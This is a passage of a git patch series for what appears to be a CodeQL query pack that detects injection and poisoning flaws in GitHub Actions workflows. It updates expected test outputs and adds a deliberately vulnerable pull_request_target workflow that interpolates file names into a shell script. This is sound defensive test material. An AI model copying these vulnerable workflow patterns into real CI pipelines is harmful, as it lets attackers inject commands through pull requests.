.github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e550..0dbff955318 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4..5641ea53afd 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc11..fdb5beb09aa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66c..a18aa5bdc80 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From d13a937a5ddaa49ddd37043263fc77141694f957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:30:43 +0200 Subject: [PATCH 0322/1267] Update Cache Poisoning --- .../CWE-349/.github/workflows/test19.yml | 42 +++++++++++++++++++ .../CachePoisoningByCodeInjection.expected | 13 ++++++ 2 files changed, 55 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml new file mode 100644 index 00000000000..1f0e7291442 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml @@ -0,0 +1,42 @@ +name: Close Translation Pull Requests + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + + close-translation-prs: + + name: Close Translation Pull Requests + runs-on: ubuntu-latest + + steps: + - name: Get changed files + id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + + - name: Check the PR for translations + id: check + run: | + shopt -s nocasematch + if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then + echo "Found modified en_gb, likely a valid PR" + unset CLOSE + elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then + echo "Found modified strings.po, unwanted." + CLOSE="true" + elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then + echo "Found added strings.po, unwanted." + CLOSE="true" + elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then + echo "Found removed strings.po, unwanted." + CLOSE="true" + else + echo "No strings.po were modified or added, not a translation." + unset CLOSE + fi + echo ::set-output name=close::${CLOSE} + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected index 60c25e1cd92..e0a5e8fd4b1 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -1,7 +1,20 @@ edges +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | subpaths #select | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | From 49a2fd82b1473eaeb6b820ed57c90e58db24b332 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:32:11 +0200 Subject: [PATCH 0323/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml 